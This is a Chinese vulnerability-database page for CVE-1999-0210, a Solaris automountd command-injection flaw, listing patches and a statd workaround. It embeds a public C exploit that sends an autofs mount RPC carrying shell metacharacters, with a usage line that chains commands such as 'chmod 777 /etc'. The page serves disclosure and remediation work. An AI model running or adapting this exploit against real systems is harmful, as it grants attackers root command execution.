CVE-1999-0210
CVSS10.0
发布时间 :1997-11-26 00:00:00
修订时间 :2016-10-17 21:59:04
NMCOE    

[原文]Automount daemon automountd allows local or remote users to gain privileges via shell metacharacters.


[CNNVD]Solaris automount漏洞(CNNVD-199711-016)

        Automount守护程序automountd存在漏洞,本地或远程用户可以借助shell元字符获取权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:6076automountd can run user programs as root.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0210
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0210
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199711-016
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=88053459921223&w=2
(UNKNOWN)  BUGTRAQ  19971126 Solaris 2.5.1 automountd exploit (fwd)
http://marc.info/?l=bugtraq&m=91547759121289&w=2
(UNKNOWN)  BUGTRAQ  19990103 SUN almost has a clue! (automountd)
http://www.cert.org/advisories/CA-99-05-statd-automountd.html
(VENDOR_ADVISORY)  CERT  CA-99-05
http://www.securityfocus.com/bid/235
(UNKNOWN)  BID  235
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9910-104
(UNKNOWN)  HP  HPSBUX9910-104

- 漏洞信息

Solaris automount漏洞
危急 其他
1997-11-26 00:00:00 2005-05-02 00:00:00
远程※本地  
        Automount守护程序automountd存在漏洞,本地或远程用户可以借助shell元字符获取权限。

- 公告与补丁

        Check automountd manuals and see if you require it for your particular instance.Statd doesn't run as root in Solaris 7 so the automounter will ignore its requests. This change was made late in Solaris 7 development and did not make it into any external release. The easiest way to work around this problem quickly is running statd as a user other than root, to this end a change in /etc/init.d/nfs.client as follows (but not on Solaris 7, where such a change may break statd).
        28c28
         < /usr/lib/nfs/statd > /dev/console 2>&1
         ---
         > su daemon -c /usr/lib/nfs/statd > /dev/console 2>&1
        (make sure you keep the links in /etc/rc?.d/[SK]*nfs.client pointing to /etc/init.d/nfs.client) and run:
        $chown -R daemon /var/statmon
         $chmod -R og-w /var/statmon
        Then stop and start lockd & statd.
        Patches are available to all Sun customers at
        http://sunsolve.sun.com
        Sun Solaris 2.4 _x86
        

  •         Sun 101946-44x86
            

  •         

        Sun Solaris 2.4
        

  •         Sun 101945-50sparc
            

  •         

        Sun Solaris 2.5 _x86
        

  •         Sun 103188-25x86
            

  •         

        Sun Solaris 2.5.1 _x86
        

  •         Sun 104655-01x86
            

  •         

        Sun Solaris 2.5.1
        

  •         Sun 104654-03sparc
            

  •         

- 漏洞信息 (19199)

Solaris <= 2.5.1 automount Vulnerability (EDBID:19199)
solaris local
1997-11-26 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/235/info

The automounter daemon (automountd) answers file system mount and unmount requests from the autofs filesystem via RPC. A vulnerability has been discovered that may allow an unauthorized user to send arbitrary commands to the automounter daemons. These commands given automounter's SUID root status are executed as root.

This bug was origanally thought to be fixed by a Sun patch, however subsequent findings by a bugtraq poster discovered that the patch was insufficient. Moreover, it was initially thought that this bug was local only. Multiple parties later discovered the problem could be exploited remotely by leveraging the attack off a remote vulnerability in rpc.statd. In particular Solaris rpc.statd allows remote users to proxy RPC requests through itself so they appear to have come from the localhost. 

/*
this is really dumb automountd exploit, tested on solaris 2.5.1
./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
map is executed via popen with key given as argument, read automount(1M)

patch 10465[45] fixes this

*/

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
printf("Usage: %s mountpoint map key [opts]\n", s);
exit(0);
}

bool_t
xdr_mntrequest(xdrs, objp)
register XDR *xdrs;
mntrequest *objp;
{

register long *buf;

if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
return (FALSE);
return (TRUE);
}

bool_t
xdr_mntres(xdrs, objp)
register XDR *xdrs;
mntres *objp;
{

register long *buf;

if (!xdr_int(xdrs, &objp->status))
return (FALSE);
return (TRUE);
}

main(int argc, char *argv[]) {
char hostname[MAXHOSTNAMELEN];
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mntrequest req;
struct mntres result;

if (argc < 4)
usage(argv[0]);

req.path=argv[1];
req.map=argv[2];
req.name=argv[3];
req.opts=argv[4];
if (gethostname(hostname, sizeof(hostname)) == -1) {
perror("gethostname");
exit(0);
}
if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
tm.tv_sec=5;
tm.tv_usec=0;
stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
(char *)&result, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "mount call");
else
printf("mntres = %d.\n", result.status);
clnt_destroy(cl);
}

		

- 漏洞信息

947
Sun automountd Shell Metacharacter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

1997-11-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站